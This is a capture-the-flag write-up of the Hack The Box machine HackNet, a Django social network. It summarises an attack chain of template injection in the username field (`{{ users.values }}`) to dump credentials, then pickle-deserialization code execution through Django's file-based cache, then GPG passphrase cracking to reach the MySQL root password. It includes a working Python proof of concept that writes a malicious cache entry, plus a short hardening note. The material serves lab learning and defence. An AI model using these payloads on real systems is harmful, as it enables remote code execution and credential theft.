HackNet

Platform: Hack The Box

Season: 9

Difficulty: Medium

OS: Linux (Debian)

Date: 2025-11-06

Author: x4cc3


Executive Summary

HackNet is a Medium Linux machine running a Django social network. A server-side template injection (SSTI) in the username field, which the application renders through the Django template engine, lets `{{ users.values }}` dump every row of the user table, credentials included. SSH as mikey gives access to the application's file-based Django cache; its entries are pickled, so a crafted cache entry yields deserialization RCE and a shell as sandy. Cracking the passphrase of a GPG private key then decrypts database backups that contain the MySQL root password.
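The pickle step in the summary is worth seeing end to end. The following is an added example written for this page, not code from the box author or from Django: it reproduces the on-disk layout of Django's FileBasedCache (a pickled expiry followed by a zlib-compressed pickled value, in a file named by the MD5 of `<prefix>:<version>:<key>` with a `.djcache` suffix) and a stand-in reader that mirrors the backend's `get()` path. The key name `profile-cache`, the role split (mikey writes, a worker running as sandy reads) and the `echo` command are assumptions for illustration; the page does not name the key the real application reads.

```python
import hashlib
import os
import pickle
import tempfile
import time
import zlib

CACHE_SUFFIX = ".djcache"  # Django's FileBasedCache.cache_suffix


def key_to_filename(key, key_prefix="", version=1):
    """Mirror Django's default make_key() + FileBasedCache._key_to_file():
    '<prefix>:<version>:<key>' hashed with MD5, plus the .djcache suffix."""
    raw = f"{key_prefix}:{version}:{key}"
    return hashlib.md5(raw.encode()).hexdigest() + CACHE_SUFFIX


class PickleRCE:
    """Payload object: unpickling reconstructs it by calling os.system(cmd),
    so the command runs inside whatever process reads the cache entry."""

    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))


def write_cache_entry(cache_dir, key, value, timeout=None):
    """Write an entry in the FileBasedCache layout:
    pickle(expiry) followed by zlib(pickle(value))."""
    expiry = None if timeout is None else time.time() + timeout
    path = os.path.join(cache_dir, key_to_filename(key))
    with open(path, "wb") as f:
        f.write(pickle.dumps(expiry, pickle.HIGHEST_PROTOCOL))
        f.write(zlib.compress(pickle.dumps(value, pickle.HIGHEST_PROTOCOL)))
    return path


def read_cache_entry(cache_dir, key, default=None):
    """Stand-in for FileBasedCache.get(): read the pickled expiry, then
    unpickle the compressed value. pickle.loads() on attacker-controlled
    bytes is the unsafe step."""
    path = os.path.join(cache_dir, key_to_filename(key))
    try:
        with open(path, "rb") as f:
            expiry = pickle.load(f)
            if expiry is not None and expiry < time.time():
                return default  # Django deletes the file here as well
            return pickle.loads(zlib.decompress(f.read()))
    except FileNotFoundError:
        return default


def demo():
    """Attacker with write access to the cache directory (mikey, assumed)
    plants the payload; the reader (web worker as sandy, assumed) pops it.
    Returns os.system()'s exit status, 0 when the command ran."""
    cache_dir = tempfile.mkdtemp(prefix="django_cache_")
    write_cache_entry(cache_dir, "profile-cache",
                      PickleRCE("echo RCE via pickle as $(id -un)"))
    return read_cache_entry(cache_dir, "profile-cache")


if __name__ == "__main__":
    print("reader returned:", demo())
```

Before trying this on a target, confirm the backend and location in the project's `settings.py` (`CACHES[...]["BACKEND"]` set to `django.core.cache.backends.filebased.FileBasedCache` and its `LOCATION`), then check that the directory is writable by the user you have and readable by the user the web worker runs as; without both, the entry is never written or never deserialized. The hardening is the inverse: a cache directory owned by and writable only to the service account, or a non-file backend.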

Recon — Port Scan

Port Service
22/tcp SSH
80/tcp HTTP — Django app

Landing page

Registration page

Dashboard after login

Exploitation

Django SSTI via Username

SSTI username change

Explore page with likes

SSTI source code showing user dump